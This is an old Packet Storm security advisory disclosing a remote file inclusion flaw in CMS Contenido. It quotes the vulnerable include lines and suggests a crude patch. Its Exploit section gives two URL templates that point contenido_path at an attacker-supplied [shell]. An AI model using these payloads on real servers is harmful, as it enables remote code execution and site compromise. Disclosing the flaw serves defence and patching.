CMScontenido.txt

2006-10-17T00:00:00
ID PACKETSTORM:51017
Type packetstorm
Reporter CvIr.System
Modified 2006-10-17T00:00:00

Description

                                        
                                            `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
CMS contenido Remote File Inclusion  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Affected Software .: CMS contenido  
Download..: http://www.contenido.org/opensourcecms/en/index-a-104.html  
Risk ..............: high   
Found by ..........: CvIr.System   
Contact ...........: CvIr.System[at]gmail.com   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Affected File:   
cms/dbfs.php  
  
Vulnerable Code:  
  
include_once ($contenido_path . "includes/startup.php");  
  
  
Affected File:   
cms/front_content.php  
  
include_once ($contenido_path."includes/startup.php");   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Exploit:  
  
http://[target]/cms/dbfs.php?contenido_path=[shell]?   
http://[target]/cms/front_content.php?contenido_path=[shell]?   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Fixed bug:  
  
if(isset($_GET['contenido_path']))  
{  
echo "Fixed bug by CvIr.System";  
exit;  
}  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Special GreetingS:_ANtrAX_|Azrael|her0|Matasanos|Ednux|4ur3v0ir|FR34K|Hanowars|Bacan|xarnuz|Slappter|mnox|Zickox|Txis|The Shredder|FaLeNcE|Darkness-Mx| www.c-group.org  
`